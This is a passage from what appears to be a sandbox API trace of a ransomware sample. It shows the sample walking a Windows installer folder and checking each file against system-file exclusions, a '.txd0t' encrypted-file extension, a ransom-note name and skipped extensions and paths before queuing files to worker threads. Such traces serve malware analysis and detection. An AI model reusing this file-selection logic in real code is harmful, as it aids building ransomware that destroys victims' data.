psz1="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf" [0085.488] SetEvent (hEvent=0x410) returned 1 [0085.488] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x141aa, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0085.488] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0085.488] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0085.488] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1031", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031") returned="C:\\588bce7c90097ed212\\1031" [0085.488] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1031", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031\\") returned="C:\\588bce7c90097ed212\\1031\\" [0085.488] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1031\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" [0085.488] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0085.488] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0085.488] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0085.488] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0085.488] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0085.488] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0085.488] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0085.488] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0085.488] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0085.489] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0085.489] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0085.489] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0085.489] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0085.489] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0085.489] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0085.489] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.489] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0085.489] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0085.489] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0085.510] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0085.510] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" [0085.510] SetEvent (hEvent=0x410) returned 1 [0085.510] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0085.510] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0085.510] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0085.511] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1031", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031") returned="C:\\588bce7c90097ed212\\1031" [0085.511] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1031", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031\\") returned="C:\\588bce7c90097ed212\\1031\\" [0085.511] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1031\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1031\\SetupResources.dll" [0085.511] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0085.511] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0085.512] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0085.512] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0085.512] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0085.512] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0085.512] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0085.512] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0085.512] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0085.512] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0085.512] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0085.512] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0085.512] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0085.512] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0085.512] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0085.512] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.512] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0085.512] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0085.512] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0085.512] FindClose (in: hFindFile=0xec2170 | out: hFindFile=0xec2170) returned 1 [0085.512] GetProcessHeap () returned 0xe30000 [0085.512] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed76e0 | out: hHeap=0xe30000) returned 1 [0085.512] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1032", cAlternateFileName="")) returned 1 [0085.512] StrCmpW (psz1="1032", psz2=".") returned 1 [0085.512] StrCmpW (psz1="1032", psz2="..") returned 1 [0085.512] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0085.512] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0085.512] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1032", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1032") returned="C:\\588bce7c90097ed212\\1032" [0085.512] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="\\windows\\system32\\") returned 0x0 [0085.512] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="\\windows\\syswow64\\") returned 0x0 [0085.512] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="\\windows\\system\\") returned 0x0 [0085.512] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="\\windows\\winsxs\\") returned 0x0 [0085.512] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="\\appdata\\roaming\\") returned 0x0 [0085.513] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="\\appdata\\local\\") returned 0x0 [0085.513] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="\\appdata\\locallow\\") returned 0x0 [0085.513] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="\\all users\\microsoft\\") returned 0x0 [0085.513] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="\\inetpub\\logs\\") returned 0x0 [0085.513] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch=":\\boot\\") returned 0x0 [0085.513] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch=":\\perflogs\\") returned 0x0 [0085.513] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch=":\\programdata\\") returned 0x0 [0085.513] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch=":\\drivers\\") returned 0x0 [0085.513] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch=":\\wsus\\") returned 0x0 [0085.513] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch=":\\efstmpwp\\") returned 0x0 [0085.513] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch=":\\$recycle.bin\\") returned 0x0 [0085.513] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="crypt_detect") returned 0x0 [0085.513] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="cryptolocker") returned 0x0 [0085.513] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="ransomware") returned 0x0 [0085.513] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="C:\\WINDOWS") returned 0x0 [0085.513] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="C:\\Program Files (x86)") returned 0x0 [0085.513] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="C:\\Program Files") returned 0x0 [0085.513] GetProcessHeap () returned 0xe30000 [0085.513] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xed76e0 [0085.513] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1032", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032") returned="C:\\588bce7c90097ed212\\1032" [0085.513] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1032", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032\\*") returned="C:\\588bce7c90097ed212\\1032\\*" [0085.513] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1032\\*", lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0085.513] StrCmpW (psz1=".", psz2=".") returned 0 [0085.513] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.513] StrCmpW (psz1="..", psz2=".") returned 1 [0085.513] StrCmpW (psz1="..", psz2="..") returned 0 [0085.513] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x22ac, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0085.513] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0085.513] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0085.514] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1032", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032") returned="C:\\588bce7c90097ed212\\1032" [0085.514] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1032", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032\\") returned="C:\\588bce7c90097ed212\\1032\\" [0085.514] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1032\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned="C:\\588bce7c90097ed212\\1032\\eula.rtf" [0085.514] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0085.514] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0085.514] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0085.514] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0085.514] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0085.514] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0085.514] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0085.514] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0085.514] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0085.514] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0085.514] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0085.514] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0085.514] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0085.514] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0085.514] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0085.514] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.514] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0085.514] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0085.514] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0085.517] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0085.517] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1032\\eula.rtf", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf" [0085.517] SetEvent (hEvent=0x3fc) returned 1 [0085.517] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1510c, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0085.517] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0085.517] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0085.517] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1032", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032") returned="C:\\588bce7c90097ed212\\1032" [0085.518] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1032", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032\\") returned="C:\\588bce7c90097ed212\\1032\\" [0085.518] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1032\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" [0085.518] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0085.518] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0085.518] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0085.518] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0085.518] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0085.518] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0085.518] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0085.518] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0085.518] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0085.518] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0085.518] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0085.518] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0085.518] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0085.518] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0085.518] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0085.518] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.518] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0085.518] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0085.518] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0085.534] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0085.534] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" [0085.534] SetEvent (hEvent=0x410) returned 1 [0085.534] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0085.534] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0085.534] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0085.534] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1032", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032") returned="C:\\588bce7c90097ed212\\1032" [0085.534] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1032", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032\\") returned="C:\\588bce7c90097ed212\\1032\\" [0085.534] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1032\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1032\\SetupResources.dll" [0085.534] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0085.534] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0085.534] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0085.534] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0085.534] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0085.534] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0085.534] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0085.534] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0085.534] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0085.534] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0085.534] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0085.535] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0085.535] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0085.535] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0085.535] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0085.535] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.535] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0085.535] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0085.535] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0085.535] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0085.535] GetProcessHeap () returned 0xe30000 [0085.535] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed76e0 | out: hHeap=0xe30000) returned 1 [0085.535] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0085.535] StrCmpW (psz1="1033", psz2=".") returned 1 [0085.535] StrCmpW (psz1="1033", psz2="..") returned 1 [0085.535] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0085.535] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0085.535] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1033", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1033") returned="C:\\588bce7c90097ed212\\1033" [0085.535] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="\\windows\\system32\\") returned 0x0 [0085.535] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="\\windows\\syswow64\\") returned 0x0 [0085.535] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="\\windows\\system\\") returned 0x0 [0085.535] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="\\windows\\winsxs\\") returned 0x0 [0085.535] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="\\appdata\\roaming\\") returned 0x0 [0085.535] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="\\appdata\\local\\") returned 0x0 [0085.535] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="\\appdata\\locallow\\") returned 0x0 [0085.535] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="\\all users\\microsoft\\") returned 0x0 [0085.535] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="\\inetpub\\logs\\") returned 0x0 [0085.535] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch=":\\boot\\") returned 0x0 [0085.535] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch=":\\perflogs\\") returned 0x0 [0085.535] StrStrIW 